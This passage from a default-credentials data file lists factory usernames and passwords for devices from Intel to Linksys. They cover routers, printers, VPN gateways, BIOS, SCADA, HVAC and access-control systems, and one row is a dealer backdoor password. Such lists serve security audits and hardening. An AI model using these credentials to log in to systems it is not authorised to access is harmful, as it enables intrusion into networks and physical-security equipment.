Router,,User,NICONEX,NICONEX,,,\nintel,LanRover VPN Gateway,,6.0 >,,shiva,,,\nintel,LanRover VPN Gateway,,< 6.0,,isolation,,,\nintel,LanRover VPN Gateway,6.0+,multi,,shiva,Admin,,\nintel,LanRover VPN Gateway,below 6.0,multi,,isolation,Admin,,\nintel,LanRover,6.7,Console,root,admin,Admin,,\nintel,NetporrExpress,,,,,,,\nintel,NetporrExpress,,Admin,,,,,\nintel,Netstructure,480t,Telnet,admin,,Admin,,\nintel,Shiva Access Port,All,Telnet,admin,hello,Admin,,\nintel,Shiva LanRover,,,Guest,,User,,\nintel,Shiva LanRover,,Multi,root,,Admin,,\nintel,Shiva Lanrovers,,,root,,,,\nintel,Shiva Lanrovers,,Admin,root,,,,\nintel,Shiva Mezza ISDN Router,All,Telnet,admin,hello,Admin,,\nintel,Shiva,,,Guest,,,,\nintel,Shiva,,,root,,,,\nintel,Shiva,,Admin,root,,,,\nintel,Shiva,,Multi,Guest,,User,,\nintel,Shiva,,User,Guest,,,,\nintel,Wireless AP 2011,,2.21,,Intel,,,\nintel,Wireless AP 2011,,Admin,,Intel,,,\nintel,Wireless AP 2011,2.21,Multi,,Intel,Admin,,\nintel,Wireless Gateway,,3.x,intel,intel,,,\nintel,Wireless Gateway,,Admin,intel,intel,,,\nintel,Wireless Gateway,3.x,HTTP,intel,intel,Admin,,\nintel,intel,,,khan,kahn,,,\nintel,intel,1,Multi,khan,kahn,,,\nintel,lan rover,,6.7,root,admin,,,\nintel,lan rover,,Admin,root,admin,,,\nintel,netstructure,,480t,admin,,,,\nintel,netstructure,,Admin,admin,,,,\nintellicom,Netbiter webSCADA WS100,All,http://10.10.10.35,admin,admin,HICP Network Configuration Service,,\nintellicom,Netbiter webSCADA WS200,All,http://10.10.10.35,admin,admin,HICP Network Configuration Service,,\nintellitouch,ITC3002 VoIP Telephone Deskset,,HTTP/phone,administrator,1234,Admin,,\ninterbase,Interbase Database Server,,Admin,SYSDBA,masterkey,,,\ninterbase,Interbase Database Server,,All,SYSDBA,masterkey,,,\ninterbase,Interbase Database Server,All,Multi,SYSDBA,masterkey,Admin,,\ninterfaceware,Iguana,,,admn,password,,,\nintermec,501,,console,,1138,setup,,\nintermec,EasyLAN,,10i2,,intermec,,,\nintermec,EasyLAN,10i2,HTTP,,intermec,Admin,,\nintermec,Mobile LAN,5.25,Multi,intermec,intermec,Admin,,\nintermec,PF2i,,Multi,admin,pass,Admin,,\nintermec,PF4i PM4i,,,admin,pass,admin,,\ninternetarchive,Heritrix,1.6.0,,admin,letmein,Admin,,\nintershop,Intershop,,4,operator,$chwarzepumpe,,,\nintershop,Intershop,,Admin,operator,$chwarzepumpe,,,\nintershop,Intershop,4,HTTP,operator,$chwarzepumpe,Admin,,\nintersystems,Cache Post-RDMS,,,system,sys,,,\nintersystems,Cache Post-RDMS,,Console,system,sys,Admin,Change immediately,\nintex,organizer,,,,,,,\nintex,organizer,,Admin,,,,,\nintex,organizer,,Multi,,,Admin,,\nintuit,Quickbooks,,1.0,admin,(no-default-password),,,\nintuit,Quickbooks,,2.0,admin,(no-default-password),,,\nintuit,Quickbooks,,2004,admin,(no-default-password),,,\nintuit,Quickbooks,,2005,admin,(no-default-password),,,\nintuit,Quickbooks,,2006,admin,(no-default-password),,,\nintuit,Quickbooks,,2007,admin,(no-default-password),,,\nintuit,Quickbooks,,2008,admin,(no-default-password),,,\nintuit,Quickbooks,,2009,admin,(no-default-password),,,\nintuit,Quickbooks,,2010,admin,(no-default-password),,,\nintuit,Quickbooks,,2011,admin,(no-default-password),,,\nintuit,Quickbooks,,3.0,admin,(no-default-password),,,\nintuit,Quickbooks,,4.0,admin,(no-default-password),,,\nintuit,Quickbooks,,5.0,admin,(no-default-password),,,\nintuit,Quickbooks,,6.0,admin,(no-default-password),,,\nintuit,Quickbooks,,Enterprise 1.0,admin,(no-default-password),,,\nintuit,Quickbooks,,Enterprise 10.0,admin,(no-default-password),,,\nintuit,Quickbooks,,Enterprise 11.0,admin,(no-default-password),,,\nintuit,Quickbooks,,Enterprise 4.0,admin,(no-default-password),,,\nintuit,Quickbooks,,Enterprise 5.0,admin,(no-default-password),,,\nintuit,Quickbooks,,Enterprise 6.0,admin,(no-default-password),,,\nintuit,Quickbooks,,Enterprise 7.0,admin,(no-default-password),,,\nintuit,Quickbooks,,Enterprise 8.0,admin,(no-default-password),,,\nintuit,Quickbooks,,Enterprise 9.0,admin,(no-default-password),,,\ninventelwanadoo,LiveBox,D34A,,Admin,Admin,Admin,,\nipstar,240cm Dish and Indoor Unit,,http://192.168.5.100:8080/xWebGateway.cgi,ADMIN,operator,Admin,,\nipstar,84cm Dish and Indoor Unit,,http://192.168.5.100:8080/xWebGateway.cgi,ADMIN,operator,Admin,,\nipstar,iPSTAR Network Box,v.2+,HTTP,admin,operator,Admin,iPSTAR Network Box is used by the CSLoxInfo Broadband Satellite system.,\nipstar,iPSTAR Satellite Router/Radio,v2,HTTP,admin,operator,Admin,For CSLoxInfo and iPSTAR Customers,\nipswitch,WS_FTP Server,,,XXSESS_MGRYY,X#1833,,,\nipswitch,WS_FTP Server,,,XXSESS_MGRYY,X#1833,Admin,User's realname: Local Session Manager,\nipswitch,Whats up Gold 6.0,,,admin,admin,,Windows 9x a,\nipswitch,WhatsUp Gold,,,admin,admin,,,\nipswitch,WhatsUp Gold,,,guest,,,,\niqinvision,IQeye,,,root,system,,,\nirc,IRC Daemon,,,,FOOBAR,,,\nirc,IRC Daemon,,IRC,,FOOBAR,,,\nironport,C30,,,admin,ironport,,,\nironport,C30,,http,admin,ironport,Admin,,\nironport,Messaging Gateway Appliance,,Multi,admin,ironport,Admin,,\nironport,S650,,https,admin,ironport,,,\niso sistemi,winwork,,,,,,,\niso sistemi,winwork,,Admin,,,,,\niwill,PC BIOS,,,,iwill,,,\niwill,PC BIOS,,Admin,,iwill,,,\niwill,PC BIOS,,Console,,iwill,Admin,,\njaht,adsl router,AR41/2A,HTTP,admin,epicrouter,Admin,,\njamfsoftware,Casper Suite,,,jamfsoftware,jamfsw03,,,\njanitza,UMG 508,,,Homepage Password,0th,,,\njanitza,UMG 508,,,admin,Janitza,,,\njanitza,UMG 508,,,guest,Janitza,,,\njanitza,UMG 508,,,user,Janitza,,,\njaspersoft,Corporation Jasper Reports Server,,,demo,demo,,,\njaspersoft,Corporation Jasper Reports Server,,,jasperadmin,jasperadmin,,,\njaspersoft,Corporation Jasper Reports Server,,,joeuser,joeuser,,,\njaspersoft,Corporation Jasper Reports Server,,,superuser,superuser,,,\njd edwards,WorldVision/OneWorld,,Admin/SECOFR,JDE,JDE,,,\njd edwards,WorldVision/OneWorld,,All(?),JDE,JDE,,,\njdedwards,WorldVision/OneWorld,,Multi,PRODDTA,PRODDTA,Admin,Owner of database tables and objects,\njdedwards,WorldVision/OneWorld,All(?),Console,JDE,JDE,Admin/SECOFR,,\njdedwards,WorldVision/OneWorld,All(?),TCP 1964,JDE,JDE,Admin/SECOFR,,\njds microprocessing,Hydra 3000,,Admin,hydrasna,,,,\njds microprocessing,Hydra 3000,,r2.02,hydrasna,,,,\njdsmicroprocessing,Hydra 3000,r2.02,Console,hydrasna,,Admin,,\njeanphilippelang,Redmine,,,admin,admin,,,\njetform,Jetform Design,,,Jetform,,,,\njetform,Jetform Design,,Admin,Jetform,,,,\njetform,Jetform Design,,HTTP,Jetform,,Admin,,\njetway,PC BIOS,,,,spooml,,,\njetway,PC BIOS,,Admin,,spooml,,,\njetway,PC BIOS,,Console,,spooml,Admin,,\njohnson controls,HVAC System,,,johnson,control,,,\njohnsoncontrols,HVAC System,,modem,johnson,control,,,\njoss technology,PC BIOS,,,,57gbzb,,,\njoss technology,PC BIOS,,,,technolgi,,,\njoss technology,PC BIOS,,Admin,,57gbzb,,,\njoss technology,PC BIOS,,Admin,,technolgi,,,\njosstechnology,PC BIOS,,Console,,57gbzb,Admin,,\njosstechnology,PC BIOS,,Console,,technolgi,Admin,,\njuniper,All,,,root,,,Junos 4.4,\njuniper,CMS,All versions,https,root,juniper,admin access,,\njuniper,ISG2000,,Multi,netscreen,netscreen,Admin,Just a note - netscreen is now made by Juniper - otherwise no change,\njuniper,Junos Space,,,admin,abc123,,,\njuniper,Junos Space,,,super,juniper123,,,\njuniper,NetScreen-25,,192.168.1.1,netscreen,netscreen,Admin,,\njuniper,NetScreen-5GT,,192.168.1.1,netscreen,netscreen,Admin,,\njuniper,Peribit,,,admin,peribit,Admin,,\njuniper,SRX100,,192.168.1.1,root,,Admin,,\njuniper,SRX210,,192.168.1.1,root,,Admin,,\njuniper,SSG 140,,192.168.1.1,netscreen,netscreen,Admin,,\njuniper,SSG 20,,192.168.1.1,netscreen,netscreen,Admin,,\njuniper,SSG 5,,192.168.1.1,netscreen,netscreen,Admin,,\njuniper,ScreenOS,All,ssh or http,netscreen,netscreen,admin,,\njuniper,all mode,7.6R1.9,http://118.98.171.65,,,root,administrator juniper,\njustin hagstrom,AutoIndex,,1.3.2,admin,admin,,,\njustin hagstrom,AutoIndex,,1.3.2,test,test,,,\njustinhagstrom,AutoIndex,1.3.2,,admin,admin,Admin,,\njustinhagstrom,AutoIndex,1.3.2,,test,test,,,\nkalatel,Calibur DSR-2000e,,Multi,,3477,Admin,,\nkalatel,Calibur DSR-2000e,,on-screen menu system,,8111,restore factory defaults,,\nkaptest,usmle,,,admin,,,,\nkaptest,usmle,,Admin,admin,,,,\nkaptest,usmle,,HTTP,admin,,Admin,,\nkentico,Software Kentico CMS for ASP.NET,,,administrator,,,,\nkethinov,Kboard Forum,,0.3.x,root,password,,,\nkethinov,Kboard Forum,0.3.x,SQL,root,password,Admin,,\nkeyscan,Keyscan System V,,admin,keyscan,KEYSCAN,,,\nkeyscan,Keyscan System V,5.2,Console,keyscan,KEYSCAN,admin,,\nkodak,MIM,,,PLMIMService,NetServer,,,\nkodak,MIM,,,RNIServiceManager,NetServer,,,\nkodak,MIM,,,SA,PASSWORD,,,\nkodak,MIM,,,Service,Service,,,\nkodak,PACS,,,PACSLinkIP,NetServer,,,\nkonica minolta,7255,,admin,,sysadm,,,\nkonicaminolta,1690MF,1,web,,sysAdmin,root,,\nkonicaminolta,1690MF,1.0,web,,sysAdmin,root,,\nkonicaminolta,204c,A08E-V100- 1,http://192.168.0.192,admin,,admn,accsess cannat password,\nkonicaminolta,2430DL,all versions,,,administrator,administrative access,Current password listed on this site is wrong. Correct default password is \"\"administrator\"\" fully spelled out all lower case.,\nkonicaminolta,2430DL,all versions,,,administrator,administrative access,Current password listed on this site is wrong. Correct default password is \"administrator\" fully spelled out all lower case.,\nkonicaminolta,4650,,HTTP,admin,administrator,admin,,\nkonicaminolta,554e,,control panel,,1234567812345678,admin,,\nkonicaminolta,5550,,Front Panel,,0,Maintenance mode,,\nkonicaminolta,7216,7216,http,,sysadm,Admin,,\nkonicaminolta,7255,,Multi,,sysadm,admin,,\nkonicaminolta,BH 215,,,,sysadm,,,\nkonicaminolta,BIZHUB 7272 / IP-511A,Type A,IP,,sysadm,admin,,\nkonicaminolta,BizHUB 160(f),,HTTP,N/A,sysadm,,,\nkonicaminolta,Bizhub 600,,Admin,KM,12345678,Admin,,\nkonicaminolta,Bizhub C10,,http,,MagiMFP,Admin,,\nkonicaminolta,Bizhub C10,magicolor 2490MF,,,,MagiMFP,2016-10-31,\nkonicaminolta,Bizhub C20,,,,0,,,\nkonicaminolta,Bizhub C20,,,,000000,,,\nkonicaminolta,Bizhub C224e,all,http,,1234567812345678,Admin,,\nkonicaminolta,Bizhub C25,Current ver Septemebr 2011,ip of printer,Administrator,administrator,Admin,The manual of the printer sais '000000' as default password; i had to use 'administrator',\nkonicaminolta,Bizhub C252,all,http://192.168.0.1,console,,12345678,Administrator,\nkonicaminolta,Bizhub c360,,,Administrator,12345678,,,\nkonicaminolta,Bizhub,200,HTTP,,12345678,Admin,,\nkonicaminolta,C20,,http://xxx.xxx.xxx.xxx,Administrator,Administrator,from the login webpage,,\nkonicaminolta,C253,,Console,,12345678,admin,Tried what was listed at url and it worked on device :http://www.fixya.com/support/t888192-konica_minolta_bizbub_c253,\nkonicaminolta,C350,,,,0,,often either 00000000 or 12345678 on all KM printers,\nkonicaminolta,C350,,,,00000000,,often either 00000000 or 12345678 on all KM printers,\nkonicaminolta,C352,,console/network,,12345678,,,\nkonicaminolta,C364,-,lokal,-,1234567812345678,admin,,\nkonicaminolta,C454,,,,1234567812345678,,,\nkonicaminolta,Di 2010f,,HTTP,,0,Admin,Printer configuration interface,\nkonicaminolta,Di3510,,web,,0,,,\nkonicaminolta,Di3510,,web,,00000000,,,\nkonicaminolta,Di470,,Admin Panel,,0,admin,,\nkonicaminolta,Di470,,Admin Panel,,0000,admin,,\nkonicaminolta,Ineo250,,,administrator,0,,,\nkonicaminolta,Magiccolor 4690MF,all,http,,sysadm,Administrator,,\nkonicaminolta,Magicolor 2450,,front panel,,KM2450,,,\nkonicaminolta,Magicolor 2530DL,,,,administrator,,,\nkonicaminolta,Magicolor 4695MF,,Point webbrowser to printer's IP.,,administrator,Administrator,,\nkonicaminolta,Magicolor 5450D,All versions,HTTP,admin,,,,\nkonicaminolta,Magicolor 5550,,Font Panel,,KMM5550,Service mode,,\nkonicaminolta,Magicolor 7450ii,All ?,Printer console,,KMM7450,Service Menu,,\nkonicaminolta,Magicolor 8650,?,Console,,12345678,Admin menu,anyone know the service password for this model?,\nkonicaminolta,bizhub 163/211,bizhub 163/211,http,,sysadm,administrator,,\nkonicaminolta,bizhub 420,,console,,12345678,,,\nkonicaminolta,bizhub 501,,xxx.xxx.xxx.xxx,,12345678,Admin,,\nkonicaminolta,bizhub C10,1,http://172.16.68.19/,,,admin,,\nkonicaminolta,bizhub C20,,,administrator,administrator,Admin,,\nkonicaminolta,bizhub C220,,http,,12345678,admin,,\nkonicaminolta,bizhub C30P,,Front Panel,,0000,Maintainance Menu,,\nkonicaminolta,bizhub C30P,,Front Panel,,KMBC30P,Service Menu,,\nkonicaminolta,bizhub C554e,,http,administrator,12345678,,,\nkonicaminolta,bizhub C650,all versions,console,Administrator,12345678,system settings,Touch Utility/Counter,touch Administrator settings\nkonicaminolta,bizhub c203,all,all,,12345678,,,\nkonicaminolta,bizhub200,,http://19.168.1.116,01,1057,,,\nkonicaminolta,c284,,,,1234567812345678,,,\nkonicaminolta,di3510,all versions,10.10.10.21,,,admin,,\nkonicaminolta,magicolor 2300 DL,,Multi,,1234,Admin,,\nkonicaminolta,magicolor 2430DL,All,Multi,,,Admin,Taken from reference manual for product,\nkonicaminolta,pagepro 5650,,http,,administrator,admin,,\nkpn,ADSL,,,(username),welkom01,Business ADSL Access,See http://www.h-online.com/security/news/item/Dutch-ISP-finds-120-000-ADSL-accounts-with-default-passwords-1633549.html,\nkragerenergibredbnd,mozilla firefoz,802.11G - 2,4ghz,BREDBNDKABEL,ADMIN,,11G 2,\nkronos,Workforce Central,,,SuperUser,kronites,,,\nkti,KS-2260,,Telnet,superuser,123456,special CLI,can be disabled by renaming the regular login name to superuser,\nkti,KS2260,,Console,admin,123,Admin,,\nkti,KS2600,,Console,admin,123456,Admin,,\nkyocera,1028mfp / 1128mfp,,panel,2800,2800,system menus,change IP; reset counters etc.,\nkyocera,6970DN,,http://,,admin00,,,\nkyocera,EcoLink,,7.2,,PASSWORD,,,\nkyocera,EcoLink,,Admin,,PASSWORD,,,\nkyocera,EcoLink,7.2,HTTP,,PASSWORD,Admin,,\nkyocera,FS- 5XXX,,http://,,admin00,,,\nkyocera,FS-1020D,,HTTP,admin,,Admin,,\nkyocera,FS-1020D,,HTTP,admin,admin,Admin,,\nkyocera,FS-1028MFP,,192.168.1.69,2800,2800,admin,,\nkyocera,FS-1028MFP,,http,,admin00,,,\nkyocera,FS-1128MFP,,,,admin00,,,\nkyocera,FS-1130 MFP,,,Admin,Admin,,,\nkyocera,FS-1130MFP,,192.168.44.222,admin,!orbp2e,admin,,\nkyocera,FS-1135MFP,,DHCP,Admin,admin00,,,\nkyocera,FS-1135MFP,,Panel,3500,3500,,,\nkyocera,FS-1350DN,,http://,,admin00,,,\nkyocera,FS-1370-DN,2L0_3000.003.001 (all Versions),http,,admin00,Admin,,\nkyocera,FS-1370DN,,Display Menu,http://,,admin00,,\nkyocera,FS-2100DN,,http://,Admin,Admin,,,\nkyocera,FS-2135dn,,http://,Admin,Admin,Admin,,\nkyocera,FS-3040MFP+,,Panel,4000,4000,,,\nkyocera,FS-3920DN,,Web,,admin00,,,\nkyocera,FS-3920DN,All,http,,admin00,Admin,Not in the manual!,\nkyocera,FS-4020 DN,,HTTP,/,admin00,,,\nkyocera,FS-4020DN,,http://192.168.0.1,,admin00,Admin,,\nkyocera,FS-4200DN,,Webinterface,Admin,Admin,,,\nkyocera,FS-6025MFP,,,2500,2500,Admin,web interface,\nkyocera,FS-C2026MFP,,http,,admin00,Administrator,,\nkyocera,FS-C2126,,webpage,,admin00,need to click on login button first,,\nkyocera,FS-C5100DN,,http,,admin00,,,\nkyocera,FS-C5250DN,,,,admin00,,According to manual should be \"\"5200\"\",\nkyocera,FS-C5400DN,,,,admin00,,,\nkyocera,FS-C8020MFP,2KZ_2F00.004.019,http://192.168.1.103,Admin,Admin,,DeviceAdmin-2000,\nkyocera,FS-C8520MFP,,,Admin,Admin,,,\nkyocera,FS-C8525MFP,,http://,Admin,Admin,Admin priviledges in Command Center RX,Allows the user to modify settings relating to network,scanning etc\nkyocera,FS3140MFP,,Web Interface,,admin00,Administrator,,\nkyocera,FS6025MFP,,system menus,Admin,Admin,Admin,,\nkyocera,Intermate LAN FS Pro 10/100,K82_0371,HTTP,admin,admin,Admin,,\nkyocera,KM-4850W,,,admin,,,,\nkyocera,TASKalfa 250 Ci,,,Admin,admin00,,if enable local authentification,\nkyocera,TASKalfa 250ci,,IP,,admin00,,,\nkyocera,TASKalfa 266ci,,Console Panel,Admin,Admin,Admin,,\nkyocera,TASKalfa 300ci,,Web interface,,admin00,,,\nkyocera,TASKalfa 3050ci,all versions,web interface,Admin,Admin,Admin,,\nkyocera,TASKalfa 400ci,all versions,HTTP,,admin00,Admin,,\nkyocera,TASKalfa 400ci,all versions,local,Admin,Admin,supervisor-level access,Username and password are case sensitive,\nkyocera,TASKalfa 420i,,http,,admin00,web access admin rights,,\nkyocera,TASKalfa 4500i,,,Admin,Admin,,,\nkyocera,TaskALFA 181 KX,,,Admin,Admin,,,\nkyocera,TaskAlfa 4500I,,Console,4500,4500,Admin,,\nkyocera,TaskAlfa 520i,All versions,Console,5200,5200,Machine Administrator,,\nkyocera,Taskalfa 221,,console,,2200,,,\nkyocera,Taskalfa 250ci,,console,2500,2500,,control panel access,\nkyocera,Taskalfa i300,,web-access/tray,admin00/3000,admin00/3000,admin,,\nkyocera,Telnet Server IB-20/21,,,root,root,,,\nkyocera,Telnet Server IB-20/21,,Admin,root,root,,,\nkyocera,Telnet Server IB-20/21,,multi,root,root,Admin,,\nkyocera,ecosys M2035dn,,Web,Admin,Admin,,,\nkyocera,fs-1028mfp,,,,,,,\nkyoceramita44copystar,New models (cs-4500,etc,intro late 2011,all,browser,Admin (case sensitive),Admin (case sensitive),Administrator\nlacie,2Big Network,,,admin,admin,admin console,,\nlacie,Ethernet Big Disk,,ftp://EthernetBD,admin,admin,Big Disk Administration,,\nlacie,Ethernet Disk Mini 500GB,,,admin,admin,Admin,,\nlacie,Ethernet Disk Mini,all sizes,http://edmini,admin,admin,Administrator's Console,,\nlacie,Ethernet Disk RAID,1.4,HTTP,admin,storage,Manager console,,\nlacie,Ethernet Disk,,multi,,admin,Administrator password,,\nlacie,Ethernet Disk,,multi,myuser,myuser,Default user has access to default public folder,,\nlacie,INNS04-4200-LAC,V1.1C,192.168.1.29,admin,admin,Admin,,\nlacie,lacie ethernet Disk,,,administrator,admin,,,\nlancom,IL11,,Multi,,,Admin,,\nlanier,5618,,,,sysadm,,,\nlanier,5618,,Multi,,sysadm,,,\nlanier,LD120d,,web,Administrator,password,admin,,\nlanier,mpc 2500,1,Deault ip,admin,LEAVE ME BLANK,,,\nlanier,mpc 2500,1.,Deault ip,admin,LEAVE ME BLANK,,,\nlansa,LANSA,,,WEBADM,password,,,\nlansa,aXes,,,admin,admin,,,\nlansa,aXes,,,dev,dev,,,\nlantronics,Lantronics Terminal Server,,,,access,,,\nlantronics,Lantronics Terminal Server,,Admin,,access,,,\nlantronics,Lantronics Terminal Server,,Admin,,system,,,\nlantronix,ETS16P,,,,,,,\nlantronix,ETS16P,,Multi,,,Admin,secondary priv. password: system,\nlantronix,ETS16PR,,,,,,,\nlantronix,ETS32PR,,,,,,,\nlantronix,ETS32PR,,Multi,,,Admin,secondary priv. password: system,\nlantronix,ETS422PR,,,,,,,\nlantronix,ETS422PR,,Multi,,,Admin,secondary priv. password: system,\nlantronix,ETS4P,,,,,,,\nlantronix,ETS4P,,Multi,,,Admin,secondary priv. password: system,\nlantronix,LPS1-T Print Server,,,any,system,,j11-16,\nlantronix,LSB4,,,any,system,,any,\nlantronix,Lantronix Terminal,,,,lantronix,,,\nlantronix,Lantronix Terminal,,Admin,,lantronix,,,\nlantronix,SCS100,,,,access,,,\nlantronix,SCS100,,Multi,,access,Admin,secondary priv. password: system,\nlantronix,SCS1620,,,sysadmin,PASS,,,\nlantronix,SCS1620,,Multi,sysadmin,PASS,Admin,9600/N/8/1 XON/XOFF,\nlantronix,SCS200,,,,admin,,,\nlantronix,SCS200,,Multi,,admin,Admin,secondary priv. password: system,\nlantronix,SCS3200,,,login,access,,,\nlantronix,SCS3200,,,login,access,Admin,secondary port settings login: root password: system,\nlantronix,SCS400,,,,admin,,,\nlantronix,SCS400,,Multi,,admin,Admin,secondary priv. password: system,\nlantronix,SecureLinux Console Manager (SLC),,http/ssh,sysadmin,PASS,Admin,,\nlantronix,Terminal Server,,TCP 7000,,access,Admin,,\nlantronix,Terminal Server,,TCP 7000,,lantronix,Admin,,\nlatisnetwork,border guard,,Multi,,,Admin,,\nleading edge,PC BIOS,,,,MASTER,,,\nleading edge,PC BIOS,,Admin,,MASTER,,,\nleadingedge,PC BIOS,,Console,,MASTER,Admin,,\nlenel,,,System Administration,sa,sa,,,\nlenel,OnGuard,,http - tcp 9999,admin,admin,Admin,,\nlevel1,WAP_002,,,admin,admin,Administrator,,\nlevelone,FBR-1161,,192.168.1.254,admin,admin,Admin,,\nlevelone,FBR-1411TX,,192.168.123.254,admin,admin,Admin,,\nlevelone,FBR-1412TX,,192.168.123.254,admin,password,Admin,,\nlevelone,FBR-1415TX,,192.168.123.254,,admin,Admin,,\nlevelone,FBR-1416A,,192.168.0.1,admin,password,Admin,,\nlevelone,FBR-1418TX,,192.168.123.254,,admin,Admin,,\nlevelone,FBR-1430,,192.168.0.1,admin,password,Admin,,\nlevelone,FBR-1461A,,192.168.1.254,admin,admin,Admin,,\nlevelone,FBR-4000,,192.168.1.1,admin,,Admin,,\nlevelone,WAP-3000,,http://192.168.0.254,admin,password,admin,,\nlevelone,WAP_002,,,admin,admin,Administrator,,\nlevelone,WBR-3402A,,192.168.123.254,,admin,Admin,,\nlevelone,WBR-3404TX,,192.168.123.254,,admin,Admin,,\nlevelone,WBR-3405TX,,192.168.1.1,admin,admin,Admin,,\nlevelone,WBR-3406,,192.168.123.254,,admin,Admin,,\nlevelone,WBR-5400 MIMO,,192.168.123.254,,,Admin,,\nlevelone,WBR-6000,,192.168.0.1,admin,password,Admin,,\nlg,Aria iPECS,All,Console,,jannie,maintenance,dealer backdoor password,\nlg,LAM200E / LAM200R,,Multi,admin,epicrouter,Admin,,\nlg,LAM200E / LAM200R,,Multi,admin,epicrouter,admin,,\nlg,lsp340,,,,6278,,,\nlgic,Goldstream,,,LR-ISDN,LR-ISDN,,,\nlgic,Goldstream,,2.5.1,LR-ISDN,LR-ISDN,,,\nlgic,Goldstream,2.5.1,,LR-ISDN,LR-ISDN,,,\nliebert,Rack PDU Card (RPC),,,Liebert,Liebert,,,\nlinksys,2700v ADSL Router,,,,epicrouter,Admin,,\nlinksys,ADSL Router,,2700v,,epicrouter,,,\nlinksys,ADSL2MUE,,192.168.1.1,admin,admin,Admin,,\nlinksys,AG 241 - ADSL2 Gateway with 4-Port Switch,,Multi,admin,admin,Admin,,\nlinksys,AG041,,192.168.1.1,,admin,Admin,,\nlinksys,AG241,,192.168.1.1,admin,admin,Admin,ADSL2 Gateway with 4-Port Switch,\nlinksys,AG300,,192.168.1.1,admin,admin,Admin,,\nlinksys,AG310,,192.168.1.1,admin,admin,Admin,,\nlinksys,AM300,,192.168.1.1,admin,admin,Admin,,\nlinksys,AP 1120,,Multi,,,Admin,,\nlinksys,BEFSR41,,,,admin,,,\nlinksys,BEFSR41,,192.168.1.1,admin,admin,,,\nlinksys,BEFSR41,2,HTTP,,admin,Admin,,\nlinksys,BEFSR7(1) OR (4),,,,admin,,,\nlinksys,BEFSR7(1) OR (4),,,blank,admin,,,\nlinksys,BEFSR81,,http://192.168.0.1,admin,password,Administration,,\nlinksys,BEFSX41,,192.168.1.1,,admin,Admin,,\nlinksys,BEFW11S4 Router,,,,admin,,,\nlinksys,BEFW11S4,,1,admin,,,,\nlinksys,BEFW11S4,,Admin,admin,,,,\nlinksys,BEFW11S4,1,HTTP,admin,,Admin,,\nlinksys,BEFW11S4,4,http://192.168.1.245,,,,,\nlinksys,Comcast,Comcast-supplied,HTTP,comcast,1234,diagnostics,192.168.0.1/docsisdevicestatus.asp,\nlinksys,DSL,,,,admin,,,\nlinksys,DSL,,Admin,,admin,,,\nlinksys,DSL,,Telnet,,admin,Admin,,\nlinksys,E1000,,192.168.1.1,,admin,Admin,,\nlinksys,E1200,,192.168.1.1,admin,admin,Admin,,\nlinksys,E2000,,192.168.1.1,admin,admin,Admin,,\nlinksys,E2100L,,192.168.1.1,admin,admin,Admin,,\nlinksys,E3000,,,admin,admin,,,\nlinksys,E3000,,192.168.1.1,admin,admin,Admin,,\nlinksys,E3000,,192.168.1.1,admin,admin,admin,,\nlinksys,E4200,,192.168.1.1,admin,admin,Admin,,\nlinksys,EA2700,,,admin,admin,,,\nlinksys,EF1324,,multi,admin,,,,\nlinksys,EF1704,,multi,admin,,,,\nlinksys,EFG250,,,admin,admin,,,\nlinksys,EFG250,2,HTTP,admin,admin,,,\nlinksys,EtherFast Cable/DSL ROuter,,,Administrator,admin,,,\nlinksys,EtherFast Cable/DSL ROuter,,Admin,Administrator,admin,,,\nlinksys,EtherFast Cable/DSL ROuter,,Multi,Administrator,admin,Admin,,\nlinksys,EtherFast Cable/DSL Router,,,admin,,,,\nlinksys,EtherFast Cable/DSL Router,,Admin,admin,,,,\nlinksys,EtherFast Cable/DSL Router,,HTTP,admin,,Admin,,\nlinksys,EtherFast Cable/DSL Router,,Multi,Administrator,admin,Admin,,\nlinksys,Linksys Router DSL/Cable,,,,admin,,,\nlinksys,Linksys Router DSL/Cable,,Admin,,admin,,,\nlinksys,Linksys Router DSL/Cable,,HTTP,,admin,Admin,,\nlinksys,PAP2,,,admin,,Admin,,\nlinksys,PC22224,1,multi,admin,,Admin,,\nlinksys,PC22224,1.0,multi,admin,,Admin,,\nlinksys,PC22604,1,multi,admin,,Admin,,\nlinksys,PC22604,1.0,multi,admin,,Admin,,\nlinksys,PSUS4 USB Print Server,,,admin,admin,Administrator,,\nlinksys,RT31P2,,http://192.168.15.1,,admin,Administration,,\nlinksys,RT31P2,,http://192.168.15.1,admin,admin,Administration,,\nlinksys,RT31P2,,http://192.168.15.1/Voice_adminPage.htm,admin,admin,Voice Admin,,\nlinksys,RT31P2-AT,,http://192.168.15.1,,admin,Administration,,\nlinksys,RTP300 w/2 phone ports,1,http://192.168.15.1,admin,admin,Admin,,\nlinksys,RTP300 w/2 phone ports,1,http://192.168.15.1,user,tivonpw,update access,use for flashing firmware,\nlinksys,RV0041,,http://192.168.1.1,admin,admin,Administration,,\nlinksys,RV042,,http://192.168.1.1,admin,admin,Administration,,\nlinksys,RVS4000,,http://192.168.1.1,admin,admin,,,\nlinksys,SFE2000,,http,admin,,Admin,,\nlinksys,SFE2000,,http,l1_admin,,Admin,,\nlinksys,SFE2000P,,http,admin,,Admin,,\nlinksys,SFE2000P,,http,l1_admin,,Admin,,\nlinksys,SGE2000,,http,admin,,Admin,,\nlinksys,SGE2000,,http,l1_admin,,Admin,,\nlinksys,SGE2000P,,http,admin,,Admin,,\nlinksys,SGE2000P,,http,l1_admin,,Admin,,\nlinksys,SLM2008,,http://192.168.1.254,admin,,Administration,,\nlinksys,SPA400,,http,Admin,,Admin,,\nlinksys,SPA9000,,http,Admin,,Admin,,\nlinksys,SRW2008,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW2008MP,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW2008P,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW2016,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW2024,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW2048,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW208,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW208G,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW208L,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW208MP,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW208P,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW224,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW224G4,,http://192.168.1.254,admin,,Admin,,\nlinksys,SRW248G4,,http://192.168.1.254,admin,,Admin,,\nlinksys,SVR200,,,(AA Admin number),4x98,Autoattendant,,\nlinksys,SVR200,,,(AA Admin number),4x99,Autoattendant,,\nlinksys,SVR200,,,(username),3+(extension),User Access,,\nlinksys,SVR200,,,,3450,Operator 